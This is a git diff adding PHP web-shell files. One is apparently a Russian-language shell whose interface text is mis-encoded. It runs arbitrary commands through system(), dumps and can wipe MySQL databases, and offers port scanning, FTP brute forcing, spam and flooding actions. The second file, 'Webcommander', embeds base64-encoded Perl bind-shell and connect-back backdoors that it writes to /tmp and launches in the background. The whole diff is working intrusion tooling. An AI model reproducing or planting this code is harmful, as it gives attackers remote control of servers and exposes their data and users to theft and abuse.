+        $nbf++;
+        open_file("dump_".$dte.$dbbase.$fc."_".$nbf.".csv".$gz);
+        write_file($val."\n");
+       }
+      }
+     } else { write_file($temp); }
+     $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>";
+    }
+   }
+  }
+
+  mysql_close();
+  if (!$ftbl) { close_file(); }
+
+  echo $header;
+  echo "<br><center>Âñå äàííûå â ıòèõ òàáëèöàõ:<br> ".$tblsv." ïîìåùåíû â ôàéë óêàçàííûé íèæå:<br><br></center><table border='0' align='center' cellpadding='0' cellspacing='0'><col width=1 bgcolor='#2D7DA7'><col valign=center><col width=1 bgcolor='#2D7DA7'><col valign=center align=right><col width=1 bgcolor='#2D7DA7'><tr><td bgcolor='#2D7DA7' colspan=5></td></tr><tr><td></td><td bgcolor='#338CBD' align=center class=texte><font size=1><b>Ôàéë</b></font></td><td></td><td bgcolor='#338CBD' align=center class=texte><font size=1><b>Ğàçìåğ</b></font></td><td></td></tr><tr><td bgcolor='#2D7DA7' colspan=5></td></tr>";
+  reset($f_nm);
+  while (list($i,$val)=each($f_nm)) {
+   $coul='#99CCCC';
+   if ($i % 2) { $coul='#CFE3E3'; }
+   echo "<tr><td></td><td bgcolor=".$coul." class=texte>&nbsp;<a href='".$val."' class=link target='_blank'>".$val."&nbsp;</a></td><td></td>";
+   $fz_tmp=filesize($val);
+   if ($fcut && ($fz_tmp > $max_sql)) {
+    echo "<td bgcolor=".$coul." class=texte>&nbsp;<font size=1 color=red>".$fz_tmp." Octets</font>&nbsp;</td><td></td></tr>";
+   } else {
+    echo "<td bgcolor=".$coul." class=texte>&nbsp;<font size=1>".$fz_tmp." áàéò</font>&nbsp;</td><td></td></tr>";
+   }
+   echo "<tr><td bgcolor='#2D7DA7' colspan=5></td></tr>";
+  }
+  echo "</table><br>";
+  echo $footer;exit;
+ }
+
+ if ($sqlaction=='connect') { 
+  if(!@mysql_connect($dbhost,$dbuser,$dbpass)) { 
+   echo $header."<br><center><font color=red><b>Ïîäêëş÷åíèå íå âîçìîæíî! Ïğîâåğüòå ïğàâèëüíî ëè ââåäåíû äàííûå!</b></font></center>\n$footer";
+   exit;
+  }
+ 
+  if(!@mysql_select_db($dbbase)) { 
+   echo $header."<br><center><font color=red><<b>Ïîäêëş÷åíèå íå âîçìîæíî! Ïğîâåğüòå ïğàâåëüíî ëè ââåäèíû äàííûå!</b></font></center>\n$footer";
+   exit;
+  }
+
+  if ($secu==1) {
+   if (!file_exists($secu_config)) {
+    $fp=fopen($secu_config,"w");
+    fputs($fp,"<?php\n");
+    fputs($fp,"\$dbhost='$dbhost';\n");
+    fputs($fp,"\$dbbase='$dbbase';\n");
+    fputs($fp,"\$dbuser='$dbuser';\n");
+    fputs($fp,"\$dbpass='$dbpass';\n");
+    fputs($fp,"?>");
+    fclose($fp);
+   }
+   include($secu_config);
+  } else {
+   if (file_exists($secu_config)) { unlink($secu_config); }
+  }
+
+  mysql_connect($dbhost,$dbuser,$dbpass);
+  $tables=mysql_list_tables($dbbase);
+  $nb_tbl=mysql_num_rows($tables);
+
+  echo $header."<script language='javascript'> function checkall() { var i=0;while (i < $nb_tbl) { a='tbls['+i+']';document.formu.elements[a].checked=true;i=i+1;} } function decheckall() { var i=0;while (i < $nb_tbl) { a='tbls['+i+']';document.formu.elements[a].checked=false;i=i+1;} } </script><center><br><b>Âûáèğèòå íóæíûå âàì òàáëèöû äëÿ äàìïèíãà!</b><form action='' method='post' name=formu><input type='hidden' name='sqlaction' value='save'><input type='hidden' name='dbhost' value='$dbhost'><input type='hidden' name='dbbase' value='$dbbase'><input type='hidden' name='dbuser' value='$dbuser'><input type='hidden' name='dbpass' value='$dbpass'><DIV ID='infobull'></DIV><table border='0' width='400' align='center' cellpadding='0' cellspacing='0' class=texte><col width=1 bgcolor='#2D7DA7'><col width=30 align=center valign=center><col width=1 bgcolor='#2D7DA7'><col width=350> <col width=1 bgcolor='#2D7DA7'><tr><td bgcolor='#2D7DA7' colspan=5></td></tr><tr><td></td><td bgcolor='#336699'><input type='checkbox' name='selc' alt='Âûäåëèòü âñ¸' onclick='if (document.formu.selc.checked==true){checkall();}else{decheckall();}')\"></td><td></td><td bgcolor='#338CBD' align=center><B>Íàçâàíèÿ òàáëèö</b></td><td></td></tr><tr><td bgcolor='#2D7DA7' colspan=5></td></tr>";
+
+  $i=0;
+  while ($i < mysql_num_rows ($tables)) {
+   $coul='#99CCCC';
+   if ($i % 2) { $coul='#CFE3E3';}
+   $tb_nom=mysql_tablename ($tables,$i);
+   echo "<tr><td></td><td bgcolor='".$coul."'><input type='checkbox' name='tbls[".$i."]' value='".$tb_nom."'></td><td></td><td bgcolor='".$coul."'>&nbsp;&nbsp;&nbsp;".$tb_nom."</td><td></td></tr><tr><td bgcolor='#2D7DA7' colspan=5></td></tr>";
+   $i++;
+  }
+
+  mysql_close();
+  echo "</table><br><br><table align=center border=0><tr><td align=left class=texte> <hr> <input type='radio' name='savmode' value='csv'> 
+  Ñîõğàíèòü â ôîğìàòå csv (*.<i>csv</i>)<br> <input type='radio' name='savmode' value='sql' checked> 
+  Ñîõğàíèòü â ôîğìàòå Sql (*.<i>sql</i>)<br> <hr> <input type='radio' name='opt' value='1' checked>
+  Ñîõğàíèòü ñòğóêòóğó è äàííûå<br> <input type='radio' name='opt' value='2'>
+  Ñîõğàíèòü òîëüêî ñòğóêòóğó<br> <input type='radio' name='opt' value='3'>
+  Ñîõğàíèòü òîëüêî äàííûå<br> <hr> <input type='Checkbox' name='drp_tbl' value='1' checked>
+  Ïåğåçàïèñûâàòü ôàéë, åñëè ñóùåñòâóåò<br>  <input type='Checkbox' name='ecraz' value='1' checked>
+  Î÷èñòèòü áàçó ïîñëå ñîçäàíèÿ äàìïà<br> <input type='Checkbox' name='f_tbl' value='1'> 
+  Ïîìåùàòü êàæäóş òàáëèöó â îòäåëüíûé ôàéë<br> <input type='Checkbox' name='f_cut' value='1'>
+  Ìàêñèìàëüíûé ğàçìåğ îäíîãî äàìï-ôàéëà: <input type='text' name='max_sql' value='200000' class=form>
+  Octets<br> <input type='Checkbox' name='file_type' value='1'>
+  Gzip.<br> 
+  </td></tr></table><br><br><input type='submit' value=' Çàäàìïèòü:) ' class=form></form></center>$footer";
+  exit;
+ }
+
+// SQL actions END
+
+ if(file_exists($secu_config)) {
+  include ($secu_config);
+  $ck="checked";
+ } else {
+  $dbhost="localhost";
+  $dbbase="";
+  $dbuser="root";
+  $dbpass="";
+  $ck="";
+ }
+ 
+ echo $header."
+<table width=620 cellpadding=0 cellspacing=0 align=center> 
+ <col width=1> 
+ <col width=600> 
+ <col width=1> 
+ <tr>
+  <td></td>
+  <td align=left class=texte>
+   <br>
+   <form action='' method='post'>
+   <input type='hidden' name='sqlaction' value='connect'> 
+   <table border=0 align=center> 
+    <col> 
+    <col align=left> 
+    <tr>
+     <td colspan=2 align=center style='font:bold 9pt;font-family:verdana;'>Ââåäèòå äàííûå äëÿ ïîäêëş÷åíèş ê mySQL ñåğâåğó!<br><br></td> 
+    </tr> 
+    <tr>
+     <td class=texte>Àäğåñ ñåğâåğà:</td> 
+     <td><INPUT TYPE='TEXT' NAME='dbhost' SIZE='30' VALUE='localhost' class=form></td>
+    </tr> 
+    <tr>
+     <td class=texte>Íàçâàíèå áàçû:</td> 
+     <td><INPUT TYPE='TEXT' NAME='dbbase' SIZE='30' VALUE='' class=form></td> 
+    </tr> 
+    <tr>
+     <td class=texte>Ëîãèí:</td> 
+     <td><INPUT TYPE='TEXT' NAME='dbuser' SIZE='30' VALUE='root' class=form></td> 
+    </tr> 
+    <tr>
+     <td class=texte>Ïàğîëü</td> 
+     <td><INPUT TYPE='Password' NAME='dbpass' SIZE='30' VALUE='' class=form></td> 
+    </tr> 
+   </table> 
+   <br> <center> <br><br> 
+   <input type='submit' value=' Ïîäêëş÷èòñÿ ' class=form></center> </form> <br><br> 
+  </td> 
+  <td></td> 
+ </tr> 
+ <tr> 
+  <td height=1 colspan=3></td> 
+ </tr> 
+</table>
+</center>";
+
+}
+// SQL END
+
+/* main() */
+set_time_limit(0);
+
+if ( $action !="download") print("$HTML");
+
+if (!isset($cm)) {
+ if (!isset($action)) {
+  if (!isset($tm)) { $tm = getcwd(); }
+  $curdir = getcwd();
+  if (!@chdir($tm)) exit("<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=alert>Íåò äîñòóïà ê äåğèêòîğèè, ñìîòğè CHMOD.</td></tr></table>");
+  getdir();
+  chdir($curdir);
+  $supsub = $gdir[$j-1];
+  if (!isset($tm) ) { $tm=getcwd();}
+  readdirdata($tm);
+ } else {
+  switch ($action) {
+   case "view":
+    viewfile($tm,$fi);
+    break;
+   case "delete":
+    echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Ôàéë <b>$fi</b> óñïåøíî óäàëåí.</font></center></td></tr></table>";
+    deletef($tm);
+    break;
+   case "download":
+   if (isset($fatt) && strlen($fatt)>0) {
+    $attach=$fatt; 
+    header("Content-type: text/plain"); 
+   } 
+   else {
+    $attach=$fi;
+    header("Content-type: hackru"); 
+   }
+   header("Content-disposition: attachment; filename=\"$attach\";"); 
+   readfile($tm."/".$fi);
+   break;
+   case "download_mail":
+   download_mail($tm,$fi);
+   break;
+   case "edit":
+   editfile($tm,$fi);
+   break;
+  case "save":
+   savefile($tm,$fi);
+   break;
+  case "uploadd":
+   uploadtem();
+   break;
+  case "up":
+   up($tm);
+   break;
+  case "newdir":
+   newdir($tm);
+   break;
+  case "createdir":
+   cdir($tm);
+   break;
+  case "deldir":
+   deldir();
+   break;
+  case "feedback":
+   mailsystem();
+   break;
+  case "upload":
+   upload();
+   break;
+  case "help":
+   help();
+   break;
+  case "ftp":
+   ftp();
+   break;
+  case "portscan":
+   portscan();
+   break;
+  case "sql":
+   sql();
+   break; 
+  case "tar":
+   tar();
+   break; 
+  case "bash":
+   bash();
+   break; 
+  case "passwd":
+   passwd();
+   break; 
+  case "exploits":
+   exploits($dir);
+   break;
+  case "upload_exploits":
+   upload_exploits($dir);
+   break; 
+  case "upload_exploitsp":
+   upload_exploitsp($dir);
+   break; 
+  case "arhiv":
+   arhiv($tm,$pass);
+   break; 
+  case "crypte":
+   crypte();
+   break;
+  case "decrypte":
+   decrypte();
+   break;  
+  case "brut_ftp":
+   brut_ftp();
+   break; 
+  case "copyfile":
+   copyfile($tm,$fi);
+   break; 
+  case "down":
+   down($dir);
+   break;
+  case "downfiles":
+   downfiles($dir);
+   break; 
+  case "spam":
+   spam();
+   break; 
+   case "flud":
+   flud();
+   break; 
+  case "spam1":
+   spam1($file);
+   break; 
+  case "del":
+   del();
+   break; 
+  }
+ }
+} else {
+ echo "<br><table CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFFF BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center>Âûïîëåíî: $cm</center><pre>";
+ echo system($cm);
+ echo "</pre></td></tr></table>";
+}
+
+if ($action !="download" && $action != "flud" && $action != "down" && $action != "del" && $action != "spam1" && $action != "spam" && $action != "brut_ftp" && $action != "download_mail" && $action != "copyfile" && $action != "crypte" && $action != "decrypte" && $action != "exploits" && $action != "arhiv" && $action != "download_mail2" && $action != "feedback" && $action != "uploadd"  && $action != "newdir" && $action != "edit" && $action != "view" && $action != "help" && $action != "ftp" && $action != "portscan" && $action != "sql" && $action != "tar"  && $action != "bash" && $action != "anonimmail") {
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method='get' action='$PHP_SELF'><tr><td align=center colspan=2 class=pagetitle><b>Êîìàíäíàÿ ñòğîêà:</b></td></tr><tr><td valign=top><input type=text name=cm size=90 class='inputbox'></td><td valign=top><input type=submit value='Äàâè' class=button1 $style_button></td></tr></form></table>";
+ $perdir = @permissions(fileperms($tm));
+ if ($perdir && $perdir[7] == "w" && isset($tm)) uploadtem();
+ else echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Íå ìîãó çàãğóæàòü ôàéëû â ıòîé äåğèêòîğèè</b></font></td></tr></table>";
+ if ($perdir[7] == "w" && isset($tm)) {
+  echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method = 'POST' action = '$PHP_SELF?tm=$tm&action=createdir'><tr><td align=center colspan=2 class=pagetitle><b>Ñîçäàòü êàòàëîã:</b></td></tr><tr><td valign=top><input type=text name='newd' size=90 class='inputbox'></td><td valign=top><input type=submit value='Äàâè' class=button1 $style_button></td></tr></form></table>";
+ } else {
+  echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Íå ìîãó ñîçäàòü ïàïêó â ıòîé äåğèêòîğèè</b></td></tr></table>";
+ }
+}
+
+if ($action !="download" && $action != "flud" && $action != "down" && $action != "del" && $action != "spam" && $action != "spam1" && $action != "brut_ftp" && $action != "download_mail" && $action != "copyfile" && $action != "crypte" && $action != "decrypte" && $action != "exploits" && $action != "arhiv" && $action != "download_mail2" && $action != "feedback" && $action != "uploadd"  && $action != "newdir" && $action != "edit" && $action != "view" && $action != "help" && $action != "aliases" && $action != "portscan" && $action != "ftp" && $action != "sql" && $action != "tar" && $action != "bash" && $action != "anonimmail") {
+ echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method='get' action='$PHP_SELF'><tr><td align=center colspan=2 class=pagetitle><b>Ãîòîâûå çàïğîñû ê Unix ñåğâåğó:</b></td></tr><tr><td valign=top width=95%><select name=cm class='inputbox'>";
+ foreach ($aliases as $alias_name=>$alias_cmd) echo "<option size=80 class='inputbox'>$alias_name</option>";
+ echo "</select></td><td valign=top align=right width=5%><input type=submit value='Äàâè' class=button1 $style_button></td></tr></table></form>";
+}
+
+if ( $action !="download") echo nfm_copyright();
+?>
diff --git a/php/NGH.php b/php/NGH.php
new file mode 100644
index 0000000..103446c
--- /dev/null
+++ b/php/NGH.php
@@ -0,0 +1,462 @@
+<?
+/* Webcommander by Cr4sh_aka_RKL v0.3.9 NGH edition :p */
+
+$script = $_SERVER["SCRIPT_NAME"];
+
+/* username and pass here ***************/
+
+$user = "yourlogin";
+$pass = "yourpass";
+
+/****************************************/
+
+$login = @$_POST['login'];
+$luser = @$_POST['user'];
+$lpass = @$_POST['pass'];
+$act = @$_GET['act'];
+
+   $logo = "R0lGODlhMAAwAOYAAAAAAP////r6+jEvKzQ0NQICATc3HiAgGyoqJxsbGQ4ODXl5dPr68m1taoWFgj4+Pf39+vr6+Obm5Pj49/Ly"
+          ."8ezs693d3MXFxJaWlV5dRtDOnquphqumcCcmGrezf8G9icnFlKCdet/br9jUqePgt+fkvOTj1X94PJKLUby7sk9JHF9ZKnJrPDk4"
+          ."MEdAFD08NqqnmBUUEGxoVtnTukdFPV1cWGZlYezjxPXv2JCNgoN8ZuDcz3VvX/Dnz9vWx8fDt/jz5ZmWjrOwp/bz67mxnOrgyLu1"
+          ."p9PNwfLt41BPTamoprGYabqrkK6gh+vcwu7izOLKpObSsujVtY6Cb+nXuerZveHFnbymheTNqubQrvf18ruedvDm2LW0s9DPz/v7"
+          ."+7m5uQUFBQICAv///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+          ."AAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAAGMALAAAAAAwADAAAAf/gGOCg4SFhoeIiYqLjI2OhFORUzqUOjyXlzKaMjU1SQ0L"
+          ."j4tTXWCmp6inXV1KGA6doaKIU2ACtre4uBUSXmAODhhJsoe0uca4FLxKCxcYL8OFOrXH1BQWXjYSFw4E0IPF1NQVFUkC2tzeY9K2"
+          ."BQhJDzEAAOEU5ebb3dDSCghdFBS7MDSQZ2tCriQVbJ17NkxHghwBLIDxYsFCBQtKbCAQYBBXEosCvmgLNgwAhi9dFjQgQOABKC9K"
+          ."BhpLQjGhyGY2RHVBoK1Bgi5fbHUB4KBZv4MJEiB4kKQGKFCPDkx0ICZoLgBdXM3DpQ2MkiAOFtio8SCnozBeLgDoaCyGr623/ybw"
+          ."AtMFRo6wSWg8ClMBDFxjBLxg+MtxwrULrILksNHikRgKSgjjomFhsDEtF70cSQEjyIIBjjFKvvVAgmVcE7RY23HkhxEYnx8hEB0O"
+          ."wYTTBbVoQSJhh2bXU0A3WjEAYwEXyJMnt70AQIHcWoYgQWKC9Y8UOYQrWrHihALEBFaoGJ98PIHKCjrESB1dOnUfPlpnX9T9xAkW"
+          ."MRSsYMG/f/8VBhzAnQoxtCcdF1zs4MMMM8y3HQonoMABBx+MMEIRSAQQABJFiDDCBx4sAeEKCLQ3HRIJ7sBgCI09iIIHI4ggYwk9"
+          ."1GhCCSSMAMIHH3CAgg4svDDEEECciGARDDbRYv8iK6CwxAdMpNBDCSWMEMIGGmgAAggbyJBBBiiEoEMGJqTwg3s7CGGEEzMouYgN"
+          ."OnAQQgEAENHDDTAU0IKFI2Qgz58d/JgCAA8AYagRALxQRBVNMJSIDQ4QAYM8B9yAAxEAtEACCX4moIOYChTwQgiDPkAkEIgqWgUT"
+          ."einSQA4/RAaAGAswUCoSRwCgwBEKzhBCDDRsUOqpqfbgBKuLvPqDELrOasGtQQBQww7UMpjlB4MOkMK2OSRqLLKuwhrZAzUQOmxz"
+          ."C5hgAgyZyKDBoH/++cKd4CaiLLMPVKCAtIQOga66AxUg8LsAHLDAweXOe0O9iDTgQArjBjCYPKYyi4D/uj/AsIE8IJRqKKreLtzq"
+          ."ow+PCwEDD1A8XQLSUkvCxgB4MOgLQOCAQ6o3VHHFyIjYsAArhEaghVqESlDmvgm0wDIAHYSQqs2XZuqEzjwf4rMQSrg0wT8OvGCD"
+          ."CRbskEIS+ybKAwc6/OB1jU8Y0YIMVUhxhaOIsHACByD0wMANOHqY5Y48guiBnChkwPYNTkxdBRVRZLHFkojY96IIDPQ9wt+CDz4h"
+          ."hCy0UEQRiS9OhRSNY/E4I+O9yAAJfgPugeaEs4BAB6BPPTrpWWABBRRbaLdIgAjM3sHwBxA//PG0g764FLjnvrsVS/jOSBJdDOke"
+          ."igj28MTnyi8fRem7Q2EFc/TSL5KEEdcjyIX2T2wfOhWjl667+OOTL0oSQpyIPRftu2874/J7Xv3s9wj8TUd9/Gtf7USHOyzMb4Dj"
+          ."i9791GQEIliQCEzIYAavwMErbOGDIFzCFpZAwhKWTxEdGIAKV8jCFrrwhStMhwxnSMMa2tAQgQAAOw==";
+/* bd.pl ********************************/
+   $bind = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMSVNU"
+          ."RU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMs"
+          ."JlBGX0lORVQsJlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0"
+          ."KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkp"
+          ."KSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbGlzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hp"
+          ."bGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspKQ0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZp"
+          ."bmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4iOw0Kb3BlbiBTVERFUlIsIj4mQ09O"
+          ."TiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3NlIENPTk47DQpl"
+          ."eGl0IDA7DQp9DQp9";
+/* connectback-backdoor on perl ********/
+   $backcon = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj"
+          ."aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1p"
+          ."bmV0X2F0b24oJHRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIp"
+          ."IHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9J"
+          ."TkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8"
+          ."fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsN"
+          ."Cm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNURElOKTsNCmNsb3NlKFNURE9VVCk7"
+          ."DQpjbG9zZShTVERFUlIpOw==";
+
+if ($act == "showlogo") {
+ header("Content-type: image/gif");
+ echo base64_decode($logo);
+ exit;
+}
+if ($login) {
+ Sleep(1);
+ if ($luser == $user && $lpass == $pass) {
+  setcookie("logined", $pass);
+ } else {
+  die("<font color=#DF0000>Login error</font>");
+ }
+} else {
+ $logined = @$_COOKIE['logined'];
+ if ($logined != $pass) {
+?>
+ <form action=<?=$script?> method=POST>
+ user: <input type=text name=user><br>
+ pass: <input type=password name=pass><br><br>
+ <input type=submit name=login value=login>
+ </form>
+<?
+  exit;
+ }
+}
+?>
+ <html>
+ <head>
+ <style type="text/css"><!--
+ body {background-color: #cccccc; color: #000000; FONT-SIZE: 10pt}
+ body, td, th, h1, h2 {font-family: Verdana;}
+ pre {margin: 0px; font-family: monospace;}
+ a:link {color: #000099; text-decoration: none;}
+ a:visited {color: #000099; text-decoration: none;}
+ a:hover {text-decoration: underline;}
+ table {border-collapse: collapse;}
+ td, th { border: 1px solid #000000; font-size: 75%; vertical-align: baseline;}
+ .e {background-color: #ccccff; font-weight: bold; color: #000000;}
+ .h {background-color: #9999cc; font-weight: bold; color: #000000;}
+ .v {background-color: #cccccc; color: #000000;}
+ .v2 {background-color: #dfdfdf; color: #000000;}
+ .v3 {background-color: #FEB4BB; color: #000000;}
+ i {color: #666666; background-color: #cccccc;}
+ img {float: right; border: 0px;}
+ hr {width: 600px; background-color: #cccccc; border: 0px; height: 1px; color: #000000;}
+ input, textarea {FONT-SIZE: 8pt; border: 1px solid #222222; color: #222222; background-color: #dfdfdf; }
+ //--></style>
+ <title>Webcommander at <?=$_SERVER["HTTP_HOST"]?></title>
+ </head>
+ <body>
+<?
+$path = @rawurldecode($_GET['dir']);
+$cmd = @$_GET['cmd'];
+if ($act == "mass") {
+ $post = array_keys($_POST);
+ $todo = $_POST[$post[sizeof($post)-2]];
+ $to = $_POST[$post[sizeof($post)-1]];
+ for ($i = 0; $i < sizeof($post)-2; $i++) {
+  if ($_POST[$post[$i]]) {
+   if ($todo == "del") {
+    rm($_POST[$post[$i]]);
+   }
+   elseif ($todo == "mv") {
+    mvcp($_POST[$post[$i]], $to."/".$post[$i], $todo);
+   }
+   else {
+    mvcp($_POST[$post[$i]], $to."/".$post[$i], "cp");
+   }
+  }
+ }
+ //exit;
+}
+elseif ($act == mkdir) {
+ $dirname = @$_POST['dirname'];
+ $path = @$_POST['dir'];
+ if (!$dirname) die("<font color=#DF0000>Âåäèòå èìÿ</font>\n");
+ if (!@mkdir($path.$dirname)) die("<font color=#DF0000>Íåìîãó ñîçäàòü ïàïêó</font>\n");
+}
+elseif ($act == upload) {
+ $userfile = @$_FILES['userfile']['tmp_name'];
+ $uploaddir = @$_POST['uploaddir'];
+ if (is_uploaded_file($userfile))  {
+  @copy($userfile, $uploaddir.$_FILES['userfile']['name']);
+  @unlink($userfile);
+  $path = $uploaddir;
+ } else die("<font color=#DF0000>Îøèáêà ïğè çàãğóçêå ôàéëà</font>\n");
+}
+elseif ($act == "rm") {
+ $name = @$_GET['name'];
+ rm($name);
+ $inf = pathinfo($name);
+ $path = $inf['dirname'];
+}
+elseif ($act == "viev") {
+ $name = @$_GET['name'];
+ if (file_exists($name)) {
+  echo "<form action=".$script."?act=updatefile method=POST>\n".
+       "ôàéë <b>".$name."</b><br>\n";
+  $out = implode("", file($name));
+  echo "<textarea rows=25 cols=70 name=text>";
+  print_r ($out);
+  echo "</textarea><br>\n".
+       "<input type=hidden name=file value=\"".$name."\">\n".
+       "<input type=submit value=ñîõğàíèòü>\n".
+       "</form>\n".
+       "[ <a href=javascript:history.go(-1)>back</a> ]";
+ } else die("<font color=#DF0000>Ôàéë íå íàéäåí</font>\n");
+ exit;
+}
+elseif ($act == "updatefile") {
+ $filename = @$_POST['file'];
+ $text = @$_POST['text'];
+ if (is_writable($filename)) {
+  $handle = fopen($filename, "w+");
+  if (fwrite($handle, stripslashes($text)) === FALSE) {
+   die("<font color=#DF0000>Îøèáêà çàïèñè â ôàéë</font>\n");
+  }
+ } else die("<font color=#DF0000>Ôàéë íåäîñòóïåí äëÿ çàïèñè</font>\n");
+ fclose($handle);
+ $inf = pathinfo($filename);
+ $path = $inf['dirname'];
+}
+elseif ($act == "touch") {
+ $userfile = @$_POST['file'];
+ $userdir = @$_POST['dir'];
+ if (!$userfile) {
+  die("<font color=#DF0000>Âåäèòå èìÿ</font>\n");
+ }
+ $handle = fopen($userdir.$userfile, "w+");
+ if (fwrite($handle, "") === FALSE)  {
+   die("<font color=#DF0000>Îøèáêà ñîçäàíèÿ ôàéëà</font>\n");
+ }
+ fclose($handle);
+ $path = $userdir;
+}
+elseif ($act == "renameform") {
+ $name = @$_GET['name'];
+ echo "<form action=".$script."?act=rename method=POST>"
+     ."<b>Ïåğåèìåíîâàòü, êîïèğîâàòü èëè ïåğåìåñòèòü </b>".$name."<br>"
+     ."<input type=text name=to size=40 value=".$name.">"
+     ."<input type=hidden name=from value=".$name."><br>"
+     ."<input type=radio name=todo value=mv checked> ïåğåìåñòèòü<br>"
+     ."<input type=radio name=todo value=cp> ñêîïèğîâàòü<br>"
+     ."<input type=submit value=Go></form>"
+     ."[ <a href=javascript:history.go(-1)>back</a> ]";
+ exit;
+}
+elseif ($act == "rename") {
+ $from = @$_POST['from'];
+ $to = @$_POST['to'];
+ $todo = @$_POST['todo'];
+ mvcp($from, $to, $todo);
+ $inf = pathinfo($from);
+ $path = $inf['dirname'];
+}
+elseif ($act == "bindshell") {
+ $port = @$_POST['port'];
+ if (!$port) {
+  die("<font color=#DF0000>Óêàæèòå ïîğò</font>");
+ }
+ $file = "/tmp/bd";
+ $handle = fopen($file, "w+");
+ if (fputs($handle, base64_decode($bind)) === FALSE)  {
+   die("<font color=#DF0000>Îøèáêà ñîçäàíèÿ ôàéëà ".$file."</font>\n");
+ } else {
+  fclose($handle);
+  passthru("perl ".$file." ".$port." > /dev/null &");
+ }
+}
+elseif ($act == "backconnect") {
+ $port = @$_POST['port'];
+ $addr = @$_POST['addr'];
+ if (!$port || !$addr) {
+  die("<font color=#DF0000>Óêàæèòå ïîğò è àäğåññ</font>");
+ }
+ $file = "/tmp/bcon";
+ $handle = fopen($file, "w+");
+ if (fputs($handle, base64_decode($backcon)) === FALSE)  {
+   die("<font color=#DF0000>Îøèáêà ñîçäàíèÿ ôàéëà  ".$file."</font>\n");
+ } else {
+  fclose($handle);
+  passthru("perl ".$file." ".$addr." ".$port." > /dev/null &");
+ }
+}
+elseif ($act == "phpinfo") {
+ phpinfo();
+ exit;
+}
+if (!$path) {
+ $dir = getcwd()."/";
+} else {
+ $dir = stripslashes($path);
+ if ($dir[strlen($dir)-1] != "/") $dir .= "/";
+}
+$dir = str_replace("\\", "/", $dir);
+$dir = str_replace("//", "/", $dir);
+$arr = explode("/", $dir);
+for ($i=0; $i<count($arr)-2; $i++) {
+ $back .= $arr[$i]."/";
+}
+?>
+ <table class=e>
+  <tr>
+   <td rowspan=3><img src=<?=$script?>?act=showlogo></td>
+   <td><b>Host:</b></td><td class=v><?=$_SERVER["HTTP_HOST"]?></td>
+  </tr>
+  <tr>
+   <td><b>IP address:</b></td><td class=v><?=$_SERVER["SERVER_ADDR"]?></td>
+  </tr>
+  <tr>
